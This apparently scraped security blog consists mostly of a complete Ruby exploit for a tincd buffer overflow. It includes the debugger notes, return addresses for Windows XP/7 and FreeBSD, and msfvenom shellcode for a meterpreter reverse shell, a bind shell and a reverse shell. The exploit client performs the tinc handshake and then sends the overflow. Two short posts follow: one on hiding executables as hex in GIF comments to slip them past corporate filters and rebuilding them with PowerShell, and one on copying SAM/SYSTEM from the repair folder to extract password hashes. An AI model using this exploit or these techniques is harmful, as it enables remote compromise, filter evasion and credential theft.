#C:\Program Files\tinc>"C:\Program Files\Immunity Inc\Immunity Debugger\ImmunityDebugger.exe" "C:\Program Files\tinc\tincd.exe -D -d 5"
#!mona config -set workingfolder c:\logs\%p
#!mona pc 1682
#from C:\logs\tincd\pattern
cyclic = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce"
payload_winxp = cyclic
#!mona findmsp
#--> EIP overwritten with normal pattern : 0x64433864 (offset 1675)
offset = 1675
payload_winxp = "A"*offset + "BCDE"
#looks like second value on stack is pointing into our payload...
payload_winxp = "ABCD"+"E"*(offset-4)+"BCDE"
#removed \n from "\n"+payload in logic below from the original PoC
#so of course now we have to adjust everything we did until now:
length = 1683
offset = 1676 #original poc-offset is probably 1683 now
#search for pop; ret;
#!mona findwild -type instr -s "pop r32#ret"
#--> found 14739 pointers... so let's be very picky today (because we can):
#!mona findwild -n -cp asciiprint -type instr -s "pop r32#ret"
#--> found 348 pointers. e.g.
#0x662c4d71 : pop ebp # retn 10 | asciiprint,ascii {PAGE_EXECUTE_READ} [hnetcfg.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\hnetcfg.dll)
#0x662d3e7d : pop ebp # retn 10 | asciiprint,ascii {PAGE_EXECUTE_READ} [hnetcfg.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\hnetcfg.dll)
#0x662d6e5e : pop ebp # retn 10 | asciiprint,ascii {PAGE_EXECUTE_READ} [hnetcfg.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\hnetcfg.dll)
#0x662e1522 : pop ebp # retn 10 | asciiprint,ascii {PAGE_EXECUTE_READ} [hnetcfg.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\hnetcfg.dll)
eip = "qM,f" #"\x71\x4d\x2c\x66"
#This was just "nice to look at", but maybe it would be better to find a os-independent pointer, so we could use it for all os
#!mona findwild -o -type instr -s "pop r32#ret"
#--> found 4049 pointers. e.g.
#0x004fbd0e : pop esi # retf | startnull {PAGE_EXECUTE_READ} [tincd.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\tinc\tincd.exe)
#0x004a0293 : pop ecx # retf 4 | startnull {PAGE_EXECUTE_READ} [tincd.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\tinc\tincd.exe)
#0x00467de4 : pop ebx # retn 3956 | startnull {PAGE_EXECUTE_READ} [tincd.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\tinc\tincd.exe)
#0x00480990 : pop ebx # retn 3956 | startnull {PAGE_EXECUTE_READ} [tincd.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\tinc\tincd.exe)
#0x0051a9c3 : pop esi # retf 0bc3b | startnull {PAGE_EXECUTE_READ} [tincd.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\tinc\tincd.exe)
#0x0051a9cb : pop esi # retf 0bc3b | startnull {PAGE_EXECUTE_READ} [tincd.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\tinc\tincd.exe)
#0x0041caa6 : pop eax # retn | startnull {PAGE_EXECUTE_READ} [tincd.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\tinc\tincd.exe)
#eip = "\x0e\xbd\x4f\x00" #Nope! Access violation when reading [FFFFFFFF]
#eip = "\xe4\x7d\x46\x00" #Nope! Access violation when writing to [00232B7A]
eip = "\xa6\xca\x41\x00" #works fine on XP and on Windows 7
payload_winxp = "\xcc"*offset+eip #cc for int3
#works fine, our breakpoints get hit
calc_for_xp = "\x31\xC9"\
        "\x51"\
        "\x68\x63\x61\x6C\x63"\
        "\x54"\
        "\xB8\xC7\x93\xC2\x77"\
        "\xFF\xD0" #  this one is not really reliable, MOV EAX, msvcrt.system hard coded
shellcode = calc_for_xp
payload_winxp = shellcode+"\x90"*(offset-shellcode.length)+eip


#$ ./msfvenom -p windows/meterpreter/reverse_tcp exitfunc=thread lhost=192.168.56.1 -f c
meterpreter_win7 = ""\
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"\
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"\
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"\
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"\
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"\
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"\
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"\
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"\
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"\
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"\
"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"\
"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"\
"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a"\
"\x05\x68\xc0\xa8\x38\x01\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10"\
"\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e"\
"\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56"\
"\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10"\
"\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a"\
"\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6"\
"\x85\xf6\x75\xec\xc3"
shellcode = meterpreter_win7
payload_win7 = shellcode+"\x90"*(offset-shellcode.length)+eip



#
#Exploitation part FREEBSD
#
#Using the windows exploit, we see that again, our eip gets executed (same offset as windows!),
#this means it's vulnerable. Used the version from ports, tinc version 1.0.19 
#(built Apr 11 2013 16:50:07, protocol 17)
#
#Reusing: offset = 1676
#Now we see that a pointer to our payload is again second on the stack. That means we need
#to find an address that points to some pop r32#ret, but this time for the freebsd version.
#It's not as easy as on windows, because we don't have something like mona findwild and gdb is
#not even correctly showing the disassembly at eip. That's why we dumped the .text part of the
#tincd binary in gdb, opened it in a hex editor and simply searched for the following bytes/opcodes
#that represent "pop r32#ret":
#58c3
#5bc3
#59c3
#5ac3
#5dc3
#5ec3
#5cc3
#5fc3
#We actually found a couple of 5dc3. We then calculated the correct address by using the
#start of the .text section plus the offset in the dumped memory. The first couple of 5dc3
#didn't work, but we found one at the following address that works very well:
eip = "\xBB\xBA\x04\x08" #eip for pop %ebp#ret for bsd --> 0x0804BABB
#so here we go:
#./msfvenom -p bsd/x86/shell_bind_tcp -f c
bind_shell_bsd = "\x31\xc0\x50\x68\xff\x02\x11\x5c\x89\xe7\x50\x6a\x01\x6a\x02"\
"\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50\x6a\x68\x58\xcd\x80\x89"\
"\x47\xec\xb0\x6a\xcd\x80\xb0\x1e\xcd\x80\x50\x50\x6a\x5a\x58"\
"\xcd\x80\xff\x4f\xe4\x79\xf6\x50\x68\x2f\x2f\x73\x68\x68\x2f"\
"\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80"
#$ ./msfvenom -p bsd/x86/shell_reverse_tcp LHOST=192.168.56.1 -f c
reverse = "\x68\xc0\xa8\x38\x01\x68\xff\x02\x11\x5c\x89\xe7\x31\xc0\x50"\
"\x6a\x01\x6a\x02\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50\x6a\x62"\
"\x58\xcd\x80\x50\x6a\x5a\x58\xcd\x80\xff\x4f\xe8\x79\xf6\x68"\
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50"\
"\xb0\x3b\xcd\x80"
#$ ./msfvenom -p bsd/x86/exec CMD="/usr/bin/touch /tmp/kkk" -f c
touch = "\x6a\x3b\x58\x99\x52\x68\x2d\x63\x00\x00\x89\xe7\x52\x68\x6e"\
"\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\xe8\x18\x00\x00"\
"\x00\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x74\x6f\x75\x63\x68"\
"\x20\x2f\x74\x6d\x70\x2f\x6b\x6b\x6b\x00\x57\x53\x89\xe1\x52"\
"\x51\x53\x50\xcd\x80"
shellcode = touch
payload_freebsd = shellcode+"\x90"*(offset-shellcode.length)+eip #pwn!




#
#Logic, client implementation and overflow part
#

#NETWORK LAYER order (according to successful exploitation run monitored in wireshark):
#1. SYN, SYN/ACK, ACK - further TCP ACK's are not included
#2. ID, client PSH: "0 testnode2 17.0"
#3. ID, server PSH: "0 testnode2 17.0"
#4. Metakey, client PSH: "1 94 64 0 0 VALUE_1"
#5. Metakey, server PSH: "1 94 64 0 0 VALUE_2"
#6. Receive Challenge from server, server PSH: 515 bytes - 3f8a4c...
#7. Send Challenge to server, client PSH: 520 bytes - cdca80...
#--->9. Challenge Reply from server, server PSH: 43 bytes - d34d78...
#--->8. Challenge Reply to server, client PSH: 48 bytes - c2f415...
#--->11. ACK part1 of server, server PSH: 11 bytes - 93fdcf...
#--->10. ACK of client, client PSH: 16 bytes - 7ffca1...
#12. ACK part2 of server, server PSH: 69 bytes - e6051a...
#13. attack, client PSH: payload - 9d6a94...

#PROGRAM order (according to printing raw data before sending/after receiving - threading could get in the way of print!):
#1. SYN, SYN/ACK, ACK - further TCP ACK's are not included
#2. ID, client PSH: "0 testnode2 17.0"
#3. ID, server PSH: "0 testnode2 17.0"
#4. Metakey, client PSH: "1 94 64 0 0 VALUE_1"
#5. Metakey, server PSH: "1 94 64 0 0 VALUE_2"
#6. Receive Challenge from server, server PSH: 515 bytes - 3f8a4c...
#7. Send Challenge to server, client PSH: 520 bytes - cdca80...
#8. Challenge Reply to server, client PSH: 48 bytes - c2f415...
#9. Challenge Reply from server, server PSH: 43 bytes - d34d78...
#10. ACK of client, client PSH: 16 bytes - 7ffca1...
#11. ACK part1 of server, server PSH: 11 bytes - 93fdcf...
#12. ACK part2 of server, server PSH: 69 bytes - e6051a...
#13. attack, client PSH: payload - 9d6a94...

#Problematic things (aka things I did wrong):
#1. In some versions the server will send back plaintext and encrypted data in the same TCP packet, you should
#   consider that when designing the client state handler...
#2. If you port from python to ruby, don't mix up the string index and .. and ... methods. Otherwise you can run
#   into a situation where you chop off one byte, but only if the network-in buffer already has one, which makes
#   it randomly fail... stupid me

class TincExploitClient < EventMachine::Connection
  def initialize(server_file, client_file, payload)
    #no need to initialize socket, eventmachine is doing it
    super
    @buffer = ""
    @inbuffer = ""
    
    @payload = payload
    
    @encryption_queue = []
    @decryption_queue = ""

    @state = "id"
    @cryptomode_in = false
    
    #TODO: maybe get it out of the library
    @bfblocksize =  64/8 

    @client_private_key_cipher = nil
    @key_len = nil

    @hex_enc_key_S1 = nil
    @bf_enc_cipher = nil
    
    self.initCiphers(server_file, client_file)
    
    @bf_dec_cipher = nil #gets set up when we get the server info
    
  end
  
  def initCiphers(server_file, client_file)
    server_public_key_cipher = OpenSSL::PKey::RSA.new(File.read(server_file))
    
    # parse client private key
    @client_private_key_cipher = OpenSSL::PKey::RSA.new(File.read(client_file))
    
    @key_len = 256
    
    #create random key
    encryptionSuccessful = false
    while not encryptionSuccessful
      begin
        key_S1 = SecureRandom.random_bytes(@key_len)
        #can happen here:
        #`public_encrypt': data too large for modulus (OpenSSL::PKey::RSAError)
        enc_key_S1 = server_public_key_cipher.public_encrypt(key_S1, OpenSSL::PKey::RSA::NO_PADDING)
        encryptionSuccessful = true
      rescue
        #the while loop will take care
      end
    end
    puts "random key: " + key_S1.unpack("H*")[0]
    
    # encrypt rnd_key with rsa key
    puts "length of key_S1: %i" % key_S1.length
    
    @hex_enc_key_S1 = enc_key_S1.unpack("H*")[0]
    puts "hex_enc_key_S1: "+@hex_enc_key_S1
    
    # setup encryption
    bf_enc_key = key_S1[240...256]
    bf_enc_iv = key_S1[232...240]
    
    @bf_enc_cipher = OpenSSL::Cipher::Cipher.new("BF-OFB")
    @bf_enc_cipher.encrypt
    @bf_enc_cipher.key = bf_enc_key
    @bf_enc_cipher.iv = bf_enc_iv
    
    ##Looks like ruby openssl supports other lengths than multiple of 8!
    #test = @bf_enc_cipher.update("A"*10)
    #test << @bf_enc_cipher.final
    #puts "Testing cipher: "+test.unpack("H*")[0]
  end
  
  def post_init
    self.id()
  end

  def receive_data(data)
    @inbuffer += data
    puts "In state %s - inbuffer-len=%d)" % [@state, @inbuffer.length]
    if @state == "id"
      if(self.has_line())
        puts "\n++ Receive ID"
        data = self.get_line()
        puts "received data: [%s]" % (data)
        @state = "metakey"
        self.metakey()
      end           
    end
    if @state == "metakey"
      if self.has_line()
        puts "\n++ Receive METAKEY"
        data = get_line()
        puts "received data: [%s]" % (data)
        data = data.split(" ")
        raise "Error in protocol. The first byte should be an ASCII 1." unless data[0] == "1"
        hexkey_S2 = data[5].rstrip #("\n")
        raise "Error in protocol. hexkey_S2 length should be 512." unless hexkey_S2.length == 512
        @enckey_S2 = [hexkey_S2].pack("H*")
        key_S2 = @client_private_key_cipher.private_decrypt(@enckey_S2, OpenSSL::PKey::RSA::NO_PADDING)
        puts "key: "+key_S2.unpack("H*")[0]

        # setup decryption
        bf_dec_key = key_S2[240..256]
        bf_dec_iv = key_S2[232..240]

        @bf_dec_cipher = OpenSSL::Cipher::Cipher.new "BF-OFB"
        @bf_dec_cipher.encrypt
        @bf_dec_cipher.key = bf_dec_key
        @bf_dec_cipher.iv = bf_dec_iv
        #OFB mode: don't forget, it does matter if you do a 
        #@bf_dec_cipher.reset or not, but DON'T BECAUSE IT BREAKS STUFF :D
        
        @cryptomode_in = true
        
        @state = "challenge" #next expected state
        self.challenge()
      end
    end

    if @state == "challenge"
      need_len = 515
      if @inbuffer.length >= need_len
        puts "\n++ Receive CHALLENGE"
        data = self.pop_inbuffer_and_decrypt(need_len)
        puts "Got challenge: [%s]" % (data)
        data = data.split(" ", 2)
        
        raise "Error in protocol. The first byte should be an ASCII 2." unless data[0] == "2"
        challenge2 = data[1][0...512]
        challenge2 = [challenge2].pack("H*")
        puts challenge2.length
        raise "Error in protocol. challenge2 length should be 256." unless challenge2.length == 256
        
        @state = "challenge_reply"
        self.challenge_reply(challenge2)
      end
    end

    if @state == "challenge_reply"
      need_len = 43
      if @inbuffer.length >= need_len
        puts "\n++ Receive CHALLENGE REPLY"
        data = self.pop_inbuffer_and_decrypt(need_len)
        puts "Got challenge reply: [%s]" % data.unpack("H*")[0]
        @state = "ack"
        self.ack()
      end
    end

    if @state == "ack"
      need_len = 12
      if @inbuffer.length >= need_len
        data = self.pop_inbuffer_and_decrypt(need_len)
        puts "Got ack: [%s]" % data.unpack("H*")[0]
        self.overflow()
      end
    end
  end

  def handle_write()
    puts @encryption_queue.length
    puts @buffer.length
    
    if @buffer.length > 0
      sent = self.send_data(@buffer)
      @buffer = @buffer[sent..@buffer.length]
      puts "send %d bytes - buffer-len=%d" % [sent, @buffer.length]
    end
    
    # handle encryption queue
    if @encryption_queue.length > 0
      msg = @encryption_queue[0]
      @encryption_queue.delete_at(0)
      puts msg
      @buffer = @bf_enc_cipher.update(msg)
      @buffer << @bf_enc_cipher.final
      #DON'T DO A @bf_enc_cipher.reset
    end
    puts "encryption-queue len: %d messages" % (@encryption_queue.length)

    # send data
    if @buffer.length > 0
      sent = self.send_data(@buffer)
      @buffer = @buffer[sent..@buffer.length]
      puts "send %d bytes (crypto-queue-len=%d msg,buffer-len=%d)" % [sent, @encryption_queue.length, @buffer.length]
    end
  end

  def pop_inbuffer_and_decrypt(size)
    @decryption_queue = pop_inbuffer(size)
    puts @decryption_queue
    # In ruby openssl OFM works not only on full blocks, but also on
    # parts. Therefore no worries like in pycrypto and no 
    # modified decrypt routine, simply use the cipher as is.
    data = @bf_dec_cipher.update(@decryption_queue)
    data << @bf_dec_cipher.final
    #DON'T DO A bf_dec_cipher.reset
    @decryption_queue = ""
    return data
  end
  
  def pop_inbuffer(size)
    data = @inbuffer[0...size]
    if size >= @inbuffer.length
      @inbuffer = ""
    else
      @inbuffer = @inbuffer[size+1..@inbuffer.length]
    end
    return data
  end
  
  def get_line()
    idx = @inbuffer.index("\n")
    data = self.pop_inbuffer(idx)
    return data
  end
  
  def has_line()
    if @inbuffer.match("\n")
      return true
    else
      return false
    end
  end
  
  def id()
    puts "\n++ Send ID"
    msg = "0 testnode2 17.0\n".gsub("testnode2","home")
    puts "id msg len: %d" % (msg.length)
    @buffer += msg
    self.handle_write()
  end
      
  def metakey()
    puts "\n++ Send METAKEY"
    msg = "1 94 64 0 0 %s\n" % (@hex_enc_key_S1)
    puts "metakey msg len: %d" % (msg.length)
    @buffer += msg
    self.handle_write()
  end

  def challenge()
    puts "\n++ Send CHALLENGE"
    challenge = SecureRandom.random_bytes(@key_len)
    msg = "2      %s\n" % (challenge.unpack("H*")[0])
    @encryption_queue.push(msg)
    self.handle_write()
  end

  def challenge_reply(challenge2)
    puts "\n++ Send CHAL_REPLY"
    h = Digest::SHA1.hexdigest(challenge2)
    msg = "3      %s\n" % (h.upcase)
    @encryption_queue.push(msg)
    self.handle_write()
  end

  def ack()
    puts "++ Send ACK"
    @encryption_queue.push("4 %d 123 0    \n" % (TCP_PORT))
    self.handle_write()
  end

  def overflow()
    puts "++ Peng" #piff paff puff here
    buffer = @payload
    msg = "17 %d\n%s" % [buffer.length, buffer]

    plen = @bfblocksize - (msg.length % @bfblocksize)
    msg += "B" * plen
    @encryption_queue.push(msg)
    self.handle_write()
  end
  
  def unbind
    EventMachine::stop_event_loop
  end
end

payload = payload_winxp
if target.downcase() == "win7"
  payload = payload_win7
end
if target.downcase() == "freebsd"
  payload = payload_freebsd
end

EventMachine.run {
  EventMachine.connect(TCP_IP, TCP_PORT, TincExploitClient, server_public_key_file, client_private_key_file, payload)
}

Hiding files in GIF comments

Firewall, IDS, IPS, Load Balancers, Proxies, Antivirus, MAC address filtering and no USB ports. A lot of companies are filtering the information/data that is getting into their network (and out of their network). But in the end the user wants to get information from the internet. Let’s face it: Text is information. So let’s use text to get a binary executable into the corporate network. While it’s relatively easy to convert text into binaries and back on Linux and Mac (thank you bash!), it was sometimes a pain in Windows until Powershell. As far as I know Powershell is available on all Windows 7 and newer machines.

This is not a new technique, it’s already in use, for example in the SET. I read a blogpost which explains exactly what we are doing here, I just wanted to try it myself and I changed the encoding from decimal to hex, which removes the necessity for a delimiter and makes the text data smaller in general. Additional I’ll show how to hide the information in a GIF image and how to extract it on a Powershell.

Let’s first convert our binary into text (hex encoding). So first prepare the text we want to put somewhere on the internet. Here is a small python one-liner that converts notepad.exe into the required format.

In Python on Windows:

.\python.exe -c "file('C:\\Users\\user\\Desktop\\notepad_hex.txt','wb').write(file('C:\\Windows\\notepad.exe','rb').read().encode('hex'))"

In Python on Unix:

python -c "file('/tmp/notepad_hex.txt','wb').write(file('/tmp/notepad.exe','rb').read().encode('hex'))"

If you open notepad_hex.txt now, you only see hexadecimal numbers:

4d5a9000030000…

That’s already the text version you can put on a website and you can access from your company network and your company desktop machine (eg. pastebin). If you can access the notepad_hex.txt on a web server directly, it’s probably better if you use the “save as” dialogue of your browser to store it (it’s quite a long hex string). As soon as your back in your company network, save the contents to a file. Let’s assume you saved it to C:\Users\user\Desktop\notepad_hex.txt

So let’s convert the text back to an executable in our Powershell. I just adopted the code from the blogpost:

[string]$hex = get-content -path C:\Users\user\Desktop\notepad_hex.txt
[Byte[]]$temp = $hex -split '([a-f0-9]{2})' | foreach-object { if ($_) {[System.Convert]::ToByte($_,16)}}
[System.IO.File]::WriteAllBytes("C:\Users\user\Desktop\notepad.exe", $temp)

You should have notepad.exe on your Desktop now. This will also work with other file formats, for example zip files, although much slower with increasing file size.

Of course there are other methods of smuggling data into the corporate network. For example if you prefer to put the text data into a picture, you can use ImageMagick (included in the Ubuntu repositories and Mac Ports) in a shell. So for example to put the hex data into a gif comment, use the following commands (first rename an image to black.gif):

python -c "file('/tmp/something_hex.txt','wb').write(file('/tmp/something.exe','rb').read().encode('hex'))"
hex=`cat /tmp/something_hex.txt`
convert -comment "$hex" black.gif black2.gif

Note that this method on the command line only works for small hex data. I got an “Argument list too long” error for notepad, so use this command instead if it is a big file:

convert -comment @/tmp/notepad_hex.txt black.gif notepad.gif

But how do we get the data out of the picture in our Powershell? Let’s have a look at the nice ASCII Art for the Comment Extension in the GIF89a format spec:

    c. Syntax.

    7 6 5 4 3 2 1 0        Field Name                    Type
   +---------------+
0  |               |       Extension Introducer          Byte
   +---------------+
1  |               |       Comment Label                 Byte
   +---------------+

   +===============+
   |               |
N  |               |       Comment Data                  Data Sub-blocks
   |               |
   +===============+

   +---------------+
0  |               |       Block Terminator              Byte
   +---------------+

          i) Extension Introducer - Identifies the beginning of an extension
          block. This field contains the fixed value 0x21.

          ii) Comment Label - Identifies the block as a Comment Extension.
          This field contains the fixed value 0xFE.

          iii) Comment Data - Sequence of sub-blocks, each of size at most
          255 bytes and at least 1 byte, with the size in a byte preceding
          the data.  The end of the sequence is marked by the Block
          Terminator.

          iv) Block Terminator - This zero-length data block marks the end of
          the Comment Extension.

So it basically says we have to look for 0x21FE and read the number of bytes specified in the first byte. Then read again the next byte to see how many bytes we have to read and so on. Let’s do that in a Powershell:

[string]$picture = get-content -path C:\Users\user\Desktop\notepad.gif
[string]$delimiter = [Convert]::ToChar(0x21)+[Convert]::ToChar(0xFE)
[string[]]$commentarray = $picture -split $delimiter,2
[string]$junk = $commentarray[1]
[string]$hex = ""
while($true){
	[int]$length = [int][char]$junk.substring(0,1)
	$hex = $hex + $junk.substring(1,$length)
	$junk = $junk.substring($length+1)
	if($length -lt 255){
		break
	}
}
[Byte[]]$temp = $hex -split '([a-f0-9]{2})' | foreach-object { if ($_) {[System.Convert]::ToByte($_,16)}}
[System.IO.File]::WriteAllBytes("C:\Users\user\Desktop\notepad.exe", $temp)

I feel like Powershell and me could get good friends. If you want to try it yourself, save the following notepad.gif on your Desktop, change the username in the paths of the code above and copy/paste it into a Powershell.

Extracting Windows Hashes

Extracting Windows hashes for password cracking is pretty basic, right? If you try to copy the SAM and SYSTEM file from C:\WINDOWS\system32\config\ on a running Windows 2003 server you get an error message, saying that it’s already in use. So before you start using shadowcopies or ntbackup or any other tools, consider just copying C:\WINDOWS\repair\SAM and SYSTEM. Basically the same files, altough it seems that the repair folder is not always up to date.

Update: There is some more research going on pauldotcom.